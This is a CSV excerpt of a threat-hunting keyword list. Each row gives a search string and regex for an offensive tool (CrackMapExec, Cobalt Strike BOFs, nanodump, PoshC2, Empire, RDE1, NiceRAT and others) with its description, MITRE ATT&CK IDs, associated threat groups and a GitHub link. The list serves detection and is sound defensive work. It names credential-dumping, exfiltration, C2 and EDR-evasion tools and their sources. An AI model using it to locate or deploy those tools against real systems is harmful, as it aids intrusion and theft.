"*CrackMapExec*",".{0,1000}CrackMapExec.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38959"
"*crackmapexec.exe*",".{0,1000}crackmapexec\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38960"
"*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38961"
"*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38962"
"*crackmapexec.spec*",".{0,1000}crackmapexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38963"
"*crackpkcs12*",".{0,1000}crackpkcs12.{0,1000}","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","N/A","2","153","29","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z","38964"
"*crackTGS*",".{0,1000}crackTGS.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","38965"
"*Crafting malicious SYN packet*",".{0,1000}Crafting\smalicious\sSYN\spacket.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","38966"
"*Crandle_Builder.ps1*",".{0,1000}Crandle_Builder\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","38967"
"*Crassus.csproj*",".{0,1000}Crassus\.csproj.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","38969"
"*Crassus.exe*",".{0,1000}Crassus\.exe.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","38970"
"*Crassus.sln*",".{0,1000}Crassus\.sln.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","38971"
"*crate::modules::{rec2mastodon*rec2virustotal}*",".{0,1000}crate\:\:modules\:\:\{rec2mastodon.{0,1000}rec2virustotal\}.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","38972"
"*CravateRouge/autobloody*",".{0,1000}CravateRouge\/autobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","38973"
"*CravateRouge/bloodyAD*",".{0,1000}CravateRouge\/bloodyAD.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","38974"
"*crawlLdrDllList*",".{0,1000}crawlLdrDllList.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","N/A","10","10","279","55","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z","38975"
"*crcreditcards.txt*",".{0,1000}crcreditcards\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38976"
"*crde dns -*",".{0,1000}crde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38977"
"*crde https -*",".{0,1000}crde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38978"
"*crde::utils::checker*",".{0,1000}crde\:\:utils\:\:checker.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38979"
"*crde_x64.exe dns -f *",".{0,1000}crde_x64\.exe\sdns\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38980"
"*crde_x64.exe https -f *",".{0,1000}crde_x64\.exe\shttps\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38981"
"*creaktive/tsh*",".{0,1000}creaktive\/tsh.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","1","#linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","38982"
"*CrealPasswords.txt*",".{0,1000}CrealPasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38983"
"*Create %d IP@Loginl;Password*",".{0,1000}Create\s\%d\sIP\@Loginl\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","38984"
"*Create a raw socket to listen for ICMP packets cause f scappy we don't need that shit*",".{0,1000}Create\sa\sraw\ssocket\sto\slisten\sfor\sICMP\spackets\scause\sf\sscappy\swe\sdon\'t\sneed\sthat\sshit.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","38985"
"*CREATE DATABASE C2;*",".{0,1000}CREATE\sDATABASE\sC2\;.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","38986"
"*CREATE DATABASE homados*",".{0,1000}CREATE\sDATABASE\shomados.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","38987"
"*CREATE DATABASE jasmin_db*",".{0,1000}CREATE\sDATABASE\sjasmin_db.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","38988"
"*Create SSL certificate (FruityC2)*",".{0,1000}Create\sSSL\scertificate\s\(FruityC2\).{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","38989"
"*CREATE TABLE [LDAPHUNTERFINDINGS]*",".{0,1000}CREATE\sTABLE\s\[LDAPHUNTERFINDINGS\].{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","38990"
"*create_awl_payload(*",".{0,1000}create_awl_payload\(.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","38991"
"*create_com_stager(*",".{0,1000}create_com_stager\(.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","38992"
"*create_dummy_dll_file*",".{0,1000}create_dummy_dll_file.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","38993"
"*create_nemesis_db(*",".{0,1000}create_nemesis_db\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38994"
"*create_nemesis_db_pool(*",".{0,1000}create_nemesis_db_pool\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38995"
"*create_protected_process_as_user*",".{0,1000}create_protected_process_as_user.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","38996"
"*Create-ADelegReport*",".{0,1000}Create\-ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","38997"
"*CreateAssignTokenVariant.exe*",".{0,1000}CreateAssignTokenVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","38998"
"*create-aws-instance.py*",".{0,1000}create\-aws\-instance\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","38999"
"*CreateC2Dialog.*",".{0,1000}CreateC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","39000"
"*CreateC2Server*",".{0,1000}CreateC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","39001"
"*Created by Usman Sikander (a.k.a offensive-panda)*",".{0,1000}Created\sby\sUsman\sSikander\s\(a\.k\.a\soffensive\-panda\).{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","39002"
"*Created directory for PME at *",".{0,1000}Created\sdirectory\sfor\sPME\sat\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","39003"
"*createdaisypayload*",".{0,1000}createdaisypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39004"
"*CreateFile(""twin.txt""*",".{0,1000}CreateFile\(\""twin\.txt\"".{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","39005"
"*CreateFile(L""\\\\.\\EchoDrv*",".{0,1000}CreateFile\(L\""\\\\\\\\\.\\\\EchoDrv.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","39006"
"*Create-HotKeyLNK.json*",".{0,1000}Create\-HotKeyLNK\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","39007"
"*CreateImpersonateTokenVariant.exe*",".{0,1000}CreateImpersonateTokenVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39008"
"*createlinuxpayload*",".{0,1000}createlinuxpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","#linux","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39009"
"*Create-MultipleSessions.ps1*",".{0,1000}Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","39010"
"*Create-NamedPipe*",".{0,1000}Create\-NamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","39011"
"*createnewpayload*",".{0,1000}createnewpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39012"
